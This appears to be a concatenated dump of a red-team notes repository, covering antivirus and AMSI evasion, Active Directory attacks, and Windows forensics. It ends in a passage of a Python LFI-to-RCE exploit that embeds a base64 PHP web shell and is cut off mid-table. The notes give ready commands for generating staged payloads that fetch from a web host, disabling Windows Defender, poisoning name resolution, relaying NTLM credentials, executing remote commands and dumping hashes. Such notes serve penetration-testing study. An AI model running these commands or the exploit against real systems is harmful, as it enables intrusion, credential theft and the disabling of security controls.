152 |     SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
153 | 
154 | Stageless HTA Payload: 
155 | 
156 |     SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
157 | 
158 | Staged VBS:
159 | 
160 |     SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
161 | 
162 | 
163 | ## Commands 
164 | Turning off Windows Defender 
165 | 
166 |     Set-MpPreference -DisableRealtimeMonitoring $true   
167 | 
168 | Need to run Powershell as admin and reboot after running command to turn off Windows Defender indefinetly: 
169 | 
170 |     New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -name disableantispyware -value 1 -Force
171 | 
172 | 
173 | View Windows Defender logs   
174 | 
175 |     Get-WinEvent 'Microsoft-Windows-Windows Defender/Operational' MaxEvents 10 | Where-Object Id -e 1116 | Format-List 
176 | 
177 | 
178 | # Living Off the Land   
179 | https://lolbas-project.github.io/    
180 | Typical binaries used: Rundll32, Regsvr32, Msiexec, Mshta, Certutil, MSBuild, WMI command line utility (WMIC), WMI provider host (WmiPrvSe)      
181 | Bitsadmin: exfil data   
182 | Certutil: download data    
183 | 
184 | ## Use Microsoft .NET InstallUtil to Evade AppLocker   
185 | Execute code in program's local memory via reflection.    
186 | 
187 |     PS > InstallUtil /U mal.exe     #put malicious code in Uninstall routine of a program    
188 | 
189 | # Resources  
190 | ## Cheat sheets 
191 | https://github.com/sinfulz/JustEvadeBro   
192 | https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell      
193 | 
194 | ## Workshops 
195 | https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation     
196 | 
197 | ## Windows Internal Resources  
198 | https://gist.github.com/vxcute/6f850da82578b3fe6a10b65496bb6ec8   
199 | 
200 | ## Tools  
201 | https://github.com/0xDivyanshu/Injector    
202 | https://github.com/persianhydra/Xeexe-TopAntivirusEvasion   
203 | https://github.com/hfiref0x/KDU    (Vulnerable driver for testing)   
204 | 
205 | ## Further Reading 
206 | https://offensivedefence.co.uk/posts/making-amsi-jump/   
207 | https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf   
208 | https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell  
209 | https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/amsi_patch_bin.nim  
210 | https://blog.f-secure.com/hunting-for-amsi-bypasses/  
211 | https://www.contextis.com/us/blog/amsi-bypass  
212 | https://www.redteam.cafe/red-team/powershell/using-reflection-for-amsi-bypass  
213 | https://amsi.fail/  
214 | https://rastamouse.me/blog/asb-bypass-pt2/  
215 | https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html  
216 | https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/   
217 | https://www.offensive-security.com/offsec/powershell-obfuscation/       
218 | https://aptw.tf/2021/08/21/killing-defender.html  
219 | https://roberreigada.github.io/posts/playing_with_an_edr/  
220 | https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/
221 | https://depthsecurity.com/blog/obfuscating-malicious-macro-enabled-word-docs
222 | 
223 | ## Videos 
224 | https://www.youtube.com/watch?v=F_BvtXzH4a4  
225 | https://www.youtube.com/watch?v=lP2KF7_Kwxk  
226 | https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/  
227 | https://www.youtube.com/watch?v=ZLAYdGxN0IQ    (Video series)   
228 | 
229 | ## Process Injection  
230 | https://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All-wp.pdf  
231 | 
232 | 


--------------------------------------------------------------------------------
/ActiveDirectory/ReadMe.md:
--------------------------------------------------------------------------------
  1 | # Active Directory  
  2 | AD Overview and tools.   
  3 | ## Contents 
  4 | - [Active Directory](#active-directory)
  5 |   * [Contents](#contents)
  6 |   * [Active Directory Overview](#active-directory-overview)
  7 |   * [My AD Cheatsheets](#my-ad-cheatsheets)
  8 |   * [Other Cheat Sheets](#other-cheat-sheets)
  9 |   * [References](#references)
 10 |     + [Important Files to Check on the DC](#important-files-to-check-on-the-dc)
 11 |   * [Tools](#tools)
 12 |   * [General Tools](#general-tools)
 13 |   * [Responder](#responder)
 14 |     + [Crack Hashes from Responder](#crack-hashes-from-responder)
 15 |     + [NTLM Relay Attack](#ntlm-relay-attack)
 16 |   
 17 | ## Active Directory Overview 
 18 | To gain control over a domain:  
 19 | Compromise member of Domain Admin group.   
 20 | Compromise domain controller -> can modify all domain-joined computers or execute applications on them. 
 21 | 
 22 | AD: depends on DNS server, typical DC hosts DNS server that is authoritative for a given domain.    
 23 | Account types: domain admins, service accounts (can be domain admins), local admins (can't access the DC), domain users.     
 24 | Authentication mechanisms: Kerberos (uses ticket granting tickets and services to authenticate users) or NTLM (traditional Windows authentication).     
 25 | Kerberos: default authentication service that uses ticket-granting tickets and service tickets to authenticate users and give users access to other resources across the domain. Intended to be more secure than NTLM (uses 3rd party ticket authorization and stronger encryption).      
 26 | [PayloadAllTheThings - Most Common Paths to AD Compromise](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise)       
 27 | [Pentest AD Mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg)    
 28 | Typical AD pen test:
 29 | - Exploit host on domain and gain access as a domain user 
 30 | - Enumerate domain users and groups.  
 31 | - Privilege escalate or move laterally.     
 32 | - Get Domain Admin or Service Account access and onto the domain controller.     
 33 | 
 34 | Common Ways to Get AD Creds:    
 35 | - NTLM Authenticated Services  
 36 | - LDAP Bind Credentials    
 37 | - Authentication Relays      
 38 | - Microsoft Deployment Toolkit   
 39 | - Configuration Files       
 40 | 
 41 | ## My AD Cheatsheets
 42 | [Attacks](https://github.com/lw8192/Red-Team-Rising/blob/main/ActiveDirectory/Attacks.md)        
 43 | [Lateral Movement](https://github.com/lw8192/Red-Team-Rising/blob/main/ActiveDirectory/LateralMovement.md)   
 44 | ## Other Cheat Sheets
 45 | [AD Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)     
 46 | [AD Lateral Movement and Persistence Cheatsheet](https://bhanusnotes.blogspot.com/2020/12/ad-pentest-lateral-movement-persistance.html)  
 47 | [AD Cheat sheet](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)   
 48 | [Pentesting AD CheatSheet](https://i.ibb.co/TKYNCNP/Pentest-ad.png)  
 49 | [Integratio IT Cheat Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet)  
 50 | 
 51 | ## References      
 52 | [WADComs](https://wadcoms.github.io/)    
 53 |     
 54 | ### Important Files to Check on the DC
 55 |     %SYSTEMROOT%\System32\ntds.dit             #AD database with user password hashes   
 56 |     %SYSTEMROOT%\NTDS\ntds.dit                 #AD backup
 57 | 
 58 | ## Tools   
 59 | C2 Frameworks:
 60 | [PowerShell Empire](https://github.com/BC-SECURITY/Empire), Covenant    
 61 | [evil-winrm](https://github.com/nubix/evil-winrm): access Windows RM, TCP port 5985 or 5986 open.   
 62 | Responder             
 63 | Crackmapexec  
 64 | [BloodHound](https://github.com/BloodHoundAD/BloodHound), [SharpHound](https://github.com/BloodHoundAD/SharpHound) 
 65 | [Rubeus](https://github.com/GhostPack/Rubeus)       
 66 | [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 )   
 67 | [Mimikatz](https://github.com/gentilkiwi/mimikatz), [Mimikatz Cheatsheet](https://offsec.red/mimikatz-cheat-sheet/)      
 68 | 
 69 | ## General Tools 
 70 | [Impacket](https://github.com/SecureAuthCorp/impacket): collection on Python classes for working with network protocols.       
 71 | Can be finicky - you may need to uninstall / reinstall when updating if the default Kali Impacket library is being used.    
 72 | 
 73 |     #if not properly installed 
 74 |     apt install impacket-scripts  
 75 |     /usr/share/doc/python3-impacket/examples  
 76 | 
 77 | If running inside a lab network:     
 78 | [Use Impacket static binaries](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.22.dev-binaries) or binaries [here](https://github.com/Qazeer/OffensivePythonPipeline/tree/main), compile your own or manually install      
 79 | 
 80 |     #manual install (recommend trying to compile a binary before doing this)       
 81 |     upload Impacket files to target and run install script    
 82 |     sudo python3 setup.py install    
 83 |     
 84 | [ADSC-Pwn](https://github.com/bats3c/ADCSPwn)   
 85 | 
 86 | ## Responder 
 87 | Not allowed on the OSCP exam, but a common pen testing tool.                
 88 | Allows you to spoof various services then capture hashes from devices that try to authenticate to those.  
 89 | Common use: poison responses during NetNTLM authentication to capture credentials. Might be able to relay the challenge instead of just capturing it (if SMB signing is not enforced). Ref: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html       
 90 |   
 91 | Install:   
 92 | 
 93 |     git clone https://github.com/lgandx/Responder   
 94 | Responder Usage:   
 95 | Config file: edit responder.conf to disable SMB / HTTP servers, change RespondTo arguement to target a specific host     
 96 | Past sessions are logged to Responder/logs    
 97 | 
 98 |      sudo responder.py -I eth0   #start on specified interface. Hashes will be captured when a device tries to authenticate to resources on the network.               
 99 |      sudo responder.py -I eth0 -A    #analyze / listen mode, no active poisoning    
100 |     
101 | You might be able to use a LFI vulnerability to request a resource and capture a hash using Responder. Ex - http://site.com/?page=//10.10.14.25/somefile           
102 | Captured hashes will be stored in the logs folder, in a .txt file named for the protocol hash type and IP captured from.      
103 | 
104 |     username::domain:ServerChallenge:NTproofstring:modifiedntlmv2response   #NTLMv2 Responder capture format       
105 | ### Crack Hashes from Responder     
106 | 
107 |     john hashes.txt   #John the Ripper will automatically detect the format of hashes collected by Responder.    
108 |     hashcat -m 5500   #NTLMv1 (hashes captured from using a tool like Responder)     
109 |     hashcat -m 5600   #NTLMv2 (hashes captured from using a tool like Responder)   
110 | 
111 | ### NTLM Relay Attack       
112 | Use NTLMRelay or MultiRelay to relay the credentials to any SMB server which has SMB signing disabled (can't relay the creds back to the source computer unless you are relaying them to a different service). Windows workstations have SMB signing disabled by default.          
113 | [byt3bl33d3r Guide to NTLM Relaying](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)    
114 | Recon: RunFinger.py or Crackmapexec to identify hosts, OS and SMB info. Check if SMB signing is not enabled and you can perform a relay attack:                    
115 |  
116 |     /opt/Responder/tools $ python3 RunFinger.py -i 172.16.1.1/24       
117 |     crackmapexec smb --gen-relay-list smb_targets.txt 192.168.1.0/24
118 | 
119 | [NTLMRelay - Impacket Script](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)
120 | You might need to disable the SMB or HTTP servers used by Responder to avoid conflicts.    
121 | Usage:     
122 | 
123 |     sudo python3 ntlmrelayx.py -tf targets -smb2support     
124 |     sudo python3 ntlmrelayx.py -socks -smb2support -tf smb_targets.txt     
125 |     
126 | Perform a SAM dump using NTLMRelay    
127 |     python3 ntlmrelayx.py -of hashes -tf targets.txt -smb2support    
128 |     # then run Responder with SMB / HTTP off      
129 |     sudo python3 Responder.py -I eth0 -dwv     
130 | Proxychain SMB Connections - allows you to use captured creds with other Impacket scripts    
131 | 
132 |     python3 ntlmrelayx.py -tf targets.txt -smb2support -socks   
133 |     #Config Proxychains    
134 |     sudo proxychains secretdump.py -no-pass <domain>/<user>@<host_ip>    #used captured creds over the Proxy         
135 | [MultiRelay - Built into the Responder Toolkit](https://github.com/lgandx/Responder/blob/master/tools/MultiRelay.py)     
136 | Requirements:     
137 | [Pycryptdome](https://github.com/Legrandin/pycryptodome/)    
138 | 
139 |     sudo apt-get -y install python3-pip gcc-mingw-w64-x86-64 python-crypto screen      
140 |     sudo pip3 install pycryptodomex
141 |     cd Responder/tools/
142 |     x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv    
143 |     x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode     
144 | Compile MultiRelay yourself using Pyinstaller and force PyCrypto to be included:    
145 | 
146 |     pyinstaller MultiRelay.py --hiddenimport=pycryptodomex --onefile              
147 | Usage:     
148 | 
149 |     /opt/Responder/tools $ python3 MultiRelay.py -t 172.16.1.5 -u ALL -d    #Relay auth requests for all users, dump local account hashes   
150 |     /opt/Responder/tools $ python3 MultiRelay.py -t 10.10.10.10 -c "whoami"   #exec a command    
151 |     #can spawn a Meterpreter shell using exploit/multi/script/web_delivery using a PowerShell IEX command        
152 | 


--------------------------------------------------------------------------------
/Digital_Forensics/Windows_Forensics.md:
--------------------------------------------------------------------------------
  1 | # Windows Forensics   
  2 | [DFIR Cheatsheet](https://www.13cubed.com/downloads/dfir_cheat_sheet.pdf)     
  3 | [Registry Key Quick Find Chart](https://www.offsec.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf)   
  4 | [DFIR iBlue Wiki](https://www.iblue.team/)    
  5 | [Forensics Wiki](https://forensics.wiki/)       
  6 | [Windows Forensics Cheatsheet](https://github.com/bluecapesecurity/PWF/blob/main/Resources/PracticalWindowsForensics-cheat-sheet.pdf)    
  7 | 
  8 | ## PowerShell Reference    
  9 | Helpful Cmdlets     
 10 | 
 11 |     Get-Help   
 12 |     Get-Content    
 13 |     Get-ChildItem     
 14 | Output Modifiers   
 15 | 
 16 |     Out-GridView   
 17 |     ConvertTo-Csv    
 18 |     Format-Table    
 19 |     ConvertTo-Html    
 20 |     ConvertTo-Json   
 21 |     ConvertTo-Xml      
 22 |     
 23 | ## Sysinternals    
 24 | Process explorer: running processes.      
 25 | Autoruns: autostart extensibility points (ASEP).     
 26 | Process monitor: files, registry, network, proc info.     
 27 | Sysmon: event info for system monitoring and analysis.     
 28 | TCPview: view TCP and UDP activity of programs.    
 29 | ProcDump: capture memory of a running process for analysis.    
 30 | 
 31 | ## Memory Analysis with Volatility     
 32 | https://infosecwriteups.com/forensics-memory-analysis-with-volatility-6f2b9e859765    
 33 | [Volatility Usage](https://github.com/volatilityfoundation/volatility/wiki/Volatility-Usage)    
 34 | Run strings on a memory image:   
 35 | 
 36 |     strings image.mem > img.strings-asc.txt	            #ASCII strings    
 37 |     strings -e l image.mem > img.strings-unile.txt      #16 bit little endian strings   
 38 |     strings -e b image.mem > img.strings-unibe.txt      #16-bit big endian strings   
 39 | 
 40 | Usage:   
 41 | 
 42 |     vol -q -f image.mem module > output.txt   
 43 |     #then analyze text files as you normally would with a live machine (ie look at the process list)   
 44 |     vol.py -f memdump.elf --profile=Win7SP1x64 filescan > filescan.txt     #example with profile   
 45 | 
 46 | Useful Volatility modules:     
 47 | [Truecrypt Modules](https://volatility-labs.blogspot.com/2014/01/truecrypt-master-key-extraction-and.html)    
 48 | 
 49 | 	 windows.netscan.NetScan	#netsat info    
 50 | 	 windows.pstree.PsTree	        #process tree info    
 51 | 	 windows.pslist.PsList		#pslist    
 52 | 	 windows.cmdline.CmdLine	#command line ran of process    
 53 | 	 windows.filescan.FileScan	#file objects    
 54 | 	 windows.dlllist.DllList	#loaded DLLs     
 55 | 	 pslist, psscan, pstree, psxview     #processes  
 56 | 	 truecryptsummary, truecryptpassphrase, truecryptmaster   #truecrypt plugins   
 57 | 	
 58 | ## Command History on Windows   
 59 | Logging turned on by default: PSReadline command history, Script block logging (limited), AntiMalware Scan Interface (AMSI)   
 60 | Cmd shell history        
 61 | 
 62 |     doskey /h     
 63 | PSReadLine (preloaded on Windows 10)        
 64 | 
 65 |     Logs to C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\*.txt    
 66 |     Get-Command 
 67 |     Get-PSReadlineOption       -> HistorySavePath      
 68 |        
 69 | Module Event Logging (800 and 4103)     
 70 | 
 71 |     Get-WinEvent -LogName 'Windows PowerShell' -FilterXPath '*[System[(EventID=800)]]' -MaxEvents 5 | Format-Table TimeCreated, Message -Wrap
 72 |     Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath '*[System[(EventID=4103)]]' -MaxEvents 5 | Format-Table TimeCreated, Message -Wrap
 73 | 
 74 | Script block logging (event ID 4104) 
 75 | 
 76 |     Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath '*[System[(EventID=4104)]]' -MaxEvents 5 | Format-Table TimeCreated, Message -Wrap
 77 | Transcript Logging (logging location can change)       
 78 | 
 79 |     Select-String -Path C:\PSTranscripts\*\* -Pattern 'malware'
 80 | 
 81 | AMSI: scans script prior to execution in newer versions of Windows     
 82 | 
 83 |     Get-WinEvent -LogName 'Microsoft-Windows-Windows Defender/Operational' -FilterXPath "*[System[((EventID=1116) or (EventID=1117))]]" -MaxEvents 5 | Format-Table TimeCreated, Message -Wrap      
 84 |    
 85 | ## Windows Logging   
 86 | [Collection of Event IDs](https://github.com/stuhli/awesome-event-ids)    
 87 | Windows: event logs as evtx files (open in Event Viewer or use PowerShell to query).     
 88 | System Log: %systemroom%\System32\WinEvt\Logs\System.evtx    
 89 | Security Log: %systemroot%\System32\WinEvt\Logs\Security.evtx    
 90 | Application Log: %systemroot%\System32\WinEvt\Logs\Application.evtx    
 91 | Setup Logs: %systemroot%\System32\WinEvt\Logs\Setup.evtx     
 92 |    
 93 | Event IDs to monitor for possible malware: 4624, 4634, 4672, 4732, 4688, 4697     
 94 | AppLocker: application allow listing in Windows. Event ID 8004: executables blocked by AppLocker.        
 95 |     
 96 |     PS > Get-WinEvent -LogName 'Microsoft-Windows-AppLocker/EXE and DLL' | Where-Object -Property Id -EQ 8004	
 97 |     
 98 | ## Registry    
 99 | 5 root keys:HKEY_CURRENT_USER, HKEY_USERS, HKEY_LOCAL_MACHINE, HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG       
100 | HKCU: config info for currently logged in user. Subkey of HKU.         
101 | HKU: all actively loaded user profiles.    
102 | HKLM: config info for the machine.      
103 | HKCR: subkey of HKEY_LOCAL_MACHINE\Software, config info for programs to be opened.      
104 | HKCC: hardware profile used by the computer at startup.    
105 | 
106 | Registry hives located on disk in C:\Windows\System32\Config      
107 | 
108 |     DEFAULT (mounted on HKEY_USERS\DEFAULT)      
109 |     SAM (mounted on HKEY_LOCAL_MACHINE\SAM)          
110 |     SECURITY (mounted on HKEY_LOCAL_MACHINE\Security)     
111 |     SOFTWARE (mounted on HKEY_LOCAL_MACHINE\Software)     
112 |     SYSTEM (mounted on HKEY_LOCAL_MACHINE\System)     
113 | Amcache Hive      
114 | 
115 | C:\Windows\AppCompat\Programs\Amcache.hve. Windows creates this hive to save information on programs that were recently run on the system.      
116 | Some Important Registry Keys      
117 | Computer Name        
118 | SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName     
119 | 
120 | Time Zone Info      
121 | SYSTEM\CurrentControlSet\Control\TimeZoneInformation        
122 | 
123 | Network Interfaces and Past Networks     
124 | SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces        
125 | 
126 | ## RDP History    
127 | 
128 |     PS > qwinsta        #current remote sessions     
129 |     PS > get-winevent -logname "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"    
130 |     
131 | Registry RDP Connection Cache     
132 | 
133 |     HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client
134 |     2 registry keys in this section: Default (history of the last 10 RDP connections) and Servers (all RDP servers and usernames used previously to login)     
135 | 
136 | RDP Cache    
137 | Cache files are created containing the sections of the server machine screen. Use a tool to extract images stored in file.     
138 | 
139 |     C:\Users\XXX\AppData\Local\Microsoft\Terminal Server Client\Cache
140 | 
141 | ## USB Devices   
142 | Ref: https://www.sciencedirect.com/topics/computer-science/window-registry    
143 | All USB devices ever plugged in    
144 | 
145 |     PS > gci HKLM:\SYSTEM\CURRENTCONTROLSET\ENUM\usbstor	   
146 | Drives mounted to NTFS file system   
147 | 
148 |     PS > gi HKLM:\SYSTEM\MOUNTEDDEVICES	      
149 | User logged in when specific device was plugged in       
150 | 
151 |     PS > gci HKCU:\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2			
152 | USB device interface GUID, hardware ID, device class information about your device, and the last time this USB was connected to the current machine    
153 |     
154 |     PS > gci HKLM:\SYSTEM\CURRENTCONTROLSET\ENUM\USB    
155 |  Newer Windows, search for USB serial number to see when connected     
156 |  
157 |     C:\Windows\inf\setupapi.dev.log    
158 |     PS > type C:\Windows\inf\setupapi.dev.log | findstr Section   #search for string 
159 |   
160 | ## Timestomping   
161 | Find possible malware by looking for timestamps that were changed.    
162 | Key indicators of timestomping on Windows: 
163 | - When the subseconds in the $MFT’s 0x10 timestamps is .000000. Some automated tools do not change these (like Metasploit). 
164 | - If the 0x10 timestamp appears to occur before a 0x30 $MFT timestamp
165 | - If the context of a file relating to its name, parent folder or other file details is inconsistent
166 | - Comparing the $STANDARD_INFORMATION timestamps vs the $FILE_NAME timestamps in the Master File Table (MFT). 
167 | C - creation. CreationTime and CreationTimeUtc    
168 | W - last modified. LastWriteTime, LastWriteTimeUtc      
169 | A - last accessed. LastAccessTimeUtc, LastAccessTime       
170 |  
171 |  
172 |     PS > (Get-Item c:\file.txt).lastwritetime | select *      
173 |     PS > Get-Item file.txt | select name,lastwritetime, lastaccesstime, lastcreationtime     
174 |     
175 | ## Analyzing Malicious Documents     
176 | [SANS Oledump Cheatsheet](https://www.sans.org/posters/oledump-py-quick-reference/)    
177 | [Analyzing Malicious Docs Cheatsheet](https://zeltser.com/analyzing-malicious-documents/)   
178 | Binary Microsoft Office document files (.doc, .xls, etc.) use the OLE2 (a.k.a. Structured Storage) format.   
179 | OOXML document files (.docx, .xlsm, etc.) supported by Microsoft Office are compressed zip archives.    
180 | VBA macros in OOXML documents are stored inside an OLE2 binary file, which is within the zip archive.     
181 | 
182 |     oledump.py file.doc -i   #list OLE2 streams. M - means stream is a macro          
183 |     oledump.py -s 3 -S file.doc                #string dump of OLE stream  
184 |     oledump.py -s 11 -v file.doc  #extract VBA code from stream 11
185 |     oledump.py -s 3 --vbadecompresscorrupt file.doc       #recover macro    
186 |     
187 | Extract:    
188 | 
189 |  rename to .zip, extract. docx - zip files with stream docs inside for further analysis.    
190 | 


--------------------------------------------------------------------------------
/Web/lfi2rce_via_php_filters.py:
--------------------------------------------------------------------------------
  1 | #from https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
  2 | import requests
  3 | import argparse 
  4 | 
  5 | example_text = "python3 lfi2rce_via_php_filters.py http://localhost.index.php -p file -c pwd"
  6 | parser = argparse.ArgumentParser(description="LFI2RCE using PHP filters",epilog=example_text)
  7 | parser.add_argument("url", help="Vulnerable URL: example http://localhost/index.php", type=str)
  8 | parser.add_argument("-p", "--parameter",default="page", action="store_true", help="Vulnerable parameter")  
  9 | parser.add_argument("-f","--file",default="php://temp", action="store_true", help="File to use")
 10 | parser.add_argument("-c","--command", default="id", action="store_true", help="Command to execute)
 11 |   
 12 | args = parser.parse_args() 
 13 | print("Triggering LFI at {}?{} to execute {} using {}".format(args.url, args.parameter, args.command, args.file))
 14 | 
 15 | #<?=`$_GET[0]`;;?>
 16 | base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
 17 | 
 18 | #Extra conversions included just in case (if the base64 payload needs to be changed) 
 19 | conversions = {
 20 |     '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
 21 |     '1': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF1002035D.EUC-KR|convert.iconv.MAC-CYRILLIC.T.61-8BIT|convert.iconv.1046.CSIBM864|convert.iconv.OSF1002035E.UCS-4BE|convert.iconv.EBCDIC-INT1.IBM943',
 22 |     '2': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO6937.OSF1002011C|convert.iconv.CP1146.EUCJP-OPEN|convert.iconv.IBM1157.UTF8',
 23 |     '3': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-7.CSISOLATIN3|convert.iconv.ISO-8859-9.CP905|convert.iconv.IBM1112.CSPC858MULTILINGUAL|convert.iconv.EBCDIC-CP-NL.ISO-10646',
 24 |     '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
 25 |     '5': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.RUSCII.IBM275|convert.iconv.CSEBCDICFR.CP857|convert.iconv.EBCDIC-CP-WT.ISO88591',
 26 |     '6': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-37.MACUK|convert.iconv.CSIBM297.ISO-IR-203',
 27 |     '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
 28 |     '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
 29 |     '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
 30 |     'a': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9066.CP1371|convert.iconv.KOI8-RU.OSF00010101|convert.iconv.EBCDIC-CP-FR.ISO-IR-156',
 31 |     'b': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1399.UCS4',
 32 |     'c': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.8859_9.OSF100201F4|convert.iconv.IBM1112.CP1004|convert.iconv.OSF00010007.CP285|convert.iconv.IBM-1141.OSF10020402',
 33 |     'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
 34 |     'e': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.SHIFT_JISX0213|convert.iconv.IBM1164.UCS-4',
 35 |     'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
 36 |     'g': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022CN.CP855|convert.iconv.CSISO49INIS.IBM1142',
 37 |     'h': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.THAI8.OSF100201B5|convert.iconv.NS_4551-1.CP1160|convert.iconv.CP275.IBM297',
 38 |     'i': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM943|convert.iconv.CUBA.CSIBM1140',
 39 |     'j': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.UCS-4BE|convert.iconv.IBM857.OSF1002011C',
 40 |     'k': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO88594.CP912|convert.iconv.ISO-IR-121.CP1122|convert.iconv.IBM420.UTF-32LE|convert.iconv.OSF100201B5.IBM-1399',
 41 |     'l': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.MACIS|convert.iconv.CSIBM865.10646-1:1993|convert.iconv.ISO_69372.CSEBCDICATDEA',
 42 |     'm': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.CSSHIFTJIS|convert.iconv.NO2.CSIBM1399',
 43 |     'n': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM862|convert.iconv.CP860.IBM-1399',
 44 |     'o': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.CP861|convert.iconv.904.UTF-16|convert.iconv.IBM-1122.IBM1390',
 45 |     'p': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1125.IBM1146|convert.iconv.IBM284.ISO_8859-16|convert.iconv.ISO-IR-143.IBM-933',
 46 |     'q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NC_NC00-10:81.CSIBM863|convert.iconv.CP297.UTF16BE',
 47 |     'r': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-86.ISO_8859-4:1988|convert.iconv.TURKISH8.CP1149',
 48 |     's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
 49 |     't': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.WINDOWS-1251.CP1364|convert.iconv.IBM880.IBM-1146|convert.iconv.IBM-935.CP037|convert.iconv.IBM500.L3|convert.iconv.CP282.TS-5881',
 50 |     'u': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937:1992.ISO-IR-121|convert.iconv.ISO_8859-7:1987.ANSI_X3.110|convert.iconv.CSIBM1158.UTF16BE',
 51 |     'v': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.HU.ISO_6937:1992|convert.iconv.CSIBM863.IBM284',
 52 |     'w': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937-2:1983.857|convert.iconv.8859_3.EBCDIC-CP-FR',
